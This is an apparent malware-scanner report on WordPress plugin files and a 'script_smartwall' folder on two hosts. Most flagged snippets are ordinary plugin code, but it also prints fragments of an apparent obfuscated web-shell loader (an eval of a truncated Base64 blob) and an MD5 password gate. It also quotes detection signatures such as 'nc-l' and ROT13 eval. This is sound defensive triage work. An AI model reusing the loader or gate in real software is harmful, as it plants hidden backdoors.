//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 11.29 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.51 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 191.05 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 826.00 B Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
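Exploit extract_global Line: 12 Dangerous Code Injection: extracting global variable arrays allows remote attackers to inject PHP code on the target machine via an HTTP request (here `extract($_POST)` lets request fields define or overwrite variables in the calling scope) |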
extract($_POST)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/redirection/models/regex.php Size: 1.85 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 45 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.94 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.77 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 84.69 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.81 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 73.99 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Warns: 3
| Description | Match |
|---|
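Exploit too_many_chr Line: 1071 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code (Triage note: the three matched runs are consecutive codes, 0–7, 10–17 and 20–27, which reads like a character lookup table rather than a hidden string; confirm at lines 1071–1073.) |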
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 22.30 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.80 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.16 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.66 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 6.07 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.98 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.52 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 7.12 kB Created: 2021-01-20 15:41:46 Modified: 2021-11-11 23:40:41 Dangers: 1
| Description | Match |
|---|
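Function str_rot13 eval_str_rot13 Line: 177 Dangerous ROT13-encoded function name `eval` (`riny` is `eval` under ROT13) [https://www.php.net/eval] (Triage note: a four-letter match can also occur inside unrelated text; check line 177 for an actual `str_rot13` decode feeding a call.) |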
riny
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/script_smartwall/update.php Size: 9.06 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1 Dangers: 1
| Description | Match |
|---|
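Exploit password_protection_md5 Line: 9 Warning MD5 password-protection check, typically used in web shells (the match compares an unsalted MD5 of `$_REQUEST["password"]` to a hard-coded digest with loose `==`; the same digest appears in the other script_smartwall hits in this report, so it can serve as a search indicator across hosts) |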
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/script_smartwall/index.php Size: 38.45 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/tolyatti/data/www/individualki-tolyatti.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2021-01-20 15:41:44 Modified: 2021-11-11 23:40:41 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
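| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf; the matched fragment is what the string `base64` looks like when it is itself Base64-encoded at a one-byte offset, consistent with a nested encoding layer) |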
Jhc2U2N
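| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d; the matched text is the Base64 encoding of `gzinflate`, i.e. a decoder name carried inside the encoded payload) |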
Z3ppbmZsYXRl
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 14:02:52 Modified: 2020-07-24 20:06:34 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:34 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Warns: 1
| Description | Match |
|---|
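Function system Warning Potentially dangerous function `system` [https://www.php.net/system] (Triage note: the match below is the word "system" followed by a parenthesis in what appears to be a translatable message string with the `wp-asset-clean-up` text domain, not a PHP `system()` call.) |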
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 2
| Description | Match |
|---|
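Exploit execution2 Dangerous RCE (Remote Code Execution): allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] (Triage note: the match below spans from a callback-less `array_filter($allPatterns)` call to an `array_key_exists('wpacu_no_inline_js', $_GET)` check in the following method, so the two ends of the match are not the same statement; confirm in the file whether `$_GET` ever reaches a callable.) |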
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
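| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution): allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] (Triage note: the matched `array_filter($allPatterns)` call passes no callback, so the hit by itself does not show request data reaching an executable sink; read line 36 in context before treating it as RCE.) |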
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:14:32 Modified: 2021-05-16 21:14:32 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-02 14:02:10 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-12-15 23:00:46 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
|
//var/www/novosib/data/www/intim-novosibirska.info/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-12-15 23:00:47 Modified: 2020-07-24 20:06:35 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/novosib/data/www/intim-novosibirska.info/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 17:08:57 Modified: 2020-09-27 17:22:04 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/novosib/data/www/intim-novosibirska.info/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 17:08:57 Modified: 2020-09-27 17:22:04 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/novosib/data/www/intim-novosibirska.info/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 17:08:57 Modified: 2020-09-27 17:22:03 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
